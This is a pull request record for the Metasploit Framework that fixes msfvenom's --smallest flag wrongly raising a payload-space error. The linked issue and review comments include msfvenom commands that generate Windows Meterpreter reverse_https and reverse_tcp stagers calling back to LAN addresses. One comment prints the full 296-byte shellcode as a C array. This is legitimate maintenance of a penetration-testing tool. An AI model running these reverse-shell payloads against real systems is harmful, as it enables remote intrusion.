### PR TITLE
Don't raise a space violation exception when space is 0

### LINKED ISSUE #16471: Msfvenom fails with --smallest
Originally reported by @deargle in #16228 [here](https://github.com/rapid7/metasploit-framework/pull/16228#issuecomment-1101700697).

I'm troubleshooting social-engineer-toolkit payload generation, which calls msfvenom [here](https://github.com/trustedsec/social-engineer-toolkit/blob/3611133a5a77d4feed969b3a07e1571cd8456356/src/core/setcore.py#L1555) and as manually shown below.

Does this PR's fix explain why the msfvenom call is now throwing a space exception?

Running with 6.1.23-dev:
```
$ msfconsole --version
Framework Version: 6.1.23-dev
$ /usr/bin/msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.101 LPORT=443 StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows --smallest -f c
No encoder specified, outputting raw payload
Payload size: 296 bytes
Final size of c file: 1268 bytes
unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x58\x20\x8b\x48\x18\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x38\x65\x68\x02"
"\x00\x01\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";
```

Now running it with 6.1.38-dev:
```
$ msfconsole --version                                                                                           
Framework Version: 6.1.38-dev
$ /usr/bin/msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.101 LPORT=443 StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows --smallest -f c
Error: The payload exceeds the specified space
```
Edit: Side-note, I noticed that it works for 6.1.38 if you don't pass --smallest

Pretty sure this is the issue right here: https://github.com/rapid7/metasploit-framework/blob/500d08f08e3fde50b24e7b79465425bff446c353/lib/msf/core/payload_generator.rb#L172-L175 When `--smallest` is used, msfvenom defines the available space as 0 bytes, which of course nothing will fit in. I'm pretty sure most but not all payloads already generate the smallest one that they can so I'm unclear on why the option exists. I'll have to look into it a bit more.

### PR DESCRIPTION
**Pull request by zeroSteiner**
This change will prevent the `PayloadSpaceViolation` exception from being raised when space is not a positive integer. The `msfvenom` utility sets the space to 0 when the `--smallest` flag is set, which would cause this exception to be thrown. This allows 0 to continue to be used as the special value indicating that the smallest payload possible should be generated.

Fixes #16471 
Related to #16228

## Verification

List the steps needed to make sure this thing works

- [x] Run: `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 --smallest`
- [x] See it complete successfully

Without this change, the following error would be displayed:

```
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 --smallest
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Error: The payload exceeds the specified space
```

### CODE REVIEW

File: lib/msf/core/encoded_payload.rb [hunk 1]
```diff
@@ -284,7 +284,9 @@ def encode
         ilog("#{pinst.refname}: payload contains no badchars, skipping automatic encoding", 'core', LEV_0)
       end
 
-      if reqs['Space'] and (reqs['Space'] < raw.length + min)
+      # Space = 0 is a special value used by msfvenom to generate the smallest payload possible, int that case do not
```
Comment (gwillcox-r7) [inline lib/msf/core/encoded_payload.rb:287]:
```suggestion
      # Space = 0 is a special value used by msfvenom to generate the smallest payload possible. In that case do not
```

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
Before patch: 

```
 ~/git/metasploit-framework │ master ?31  ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 --smallest
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Error: The payload exceeds the specified space
 ~/git/metasploit-framework │ master ?31 
```

**Comment by gwillcox-r7** [comment]
After fix:

```
 ~/git/metasploit-framework │ land-pr16572:pr/16572 ⇡1 ?31  ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 --smallest
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 296 bytes
��`1�d�R0�R
�8�u�}�;}$u�X�X$�f�HP�X Ӆ�t<1�I�4��1����
                   K�XӋ�ЉD$$[[aYZQ��X_Z�����]h32hws2_ThLw&���и�)�TPh)�k��j
h����h\��PPPP@P@Ph����՗jVWh��ta�Յ�t
                                   �u�h�V��jjVWh��_�Ջ6j@hVjhX�S��ՓSjVSWh��_���)�u��
 ~/git/metasploit-framework │ land-pr16572:pr/16572 ⇡1 ?31 
```

**Comment by gwillcox-r7** [comment]
LGTM will land this now

**Comment by gwillcox-r7** [comment]
# Release Notes
A bug has been fixed whereby a `PayloadSpaceViolation` exception might be raised when the `--smallest` flag was used with `msfvenom`, due to `msfvenom` setting the space available to 0 instead of a positive number. The code should now appropriately account for this case.
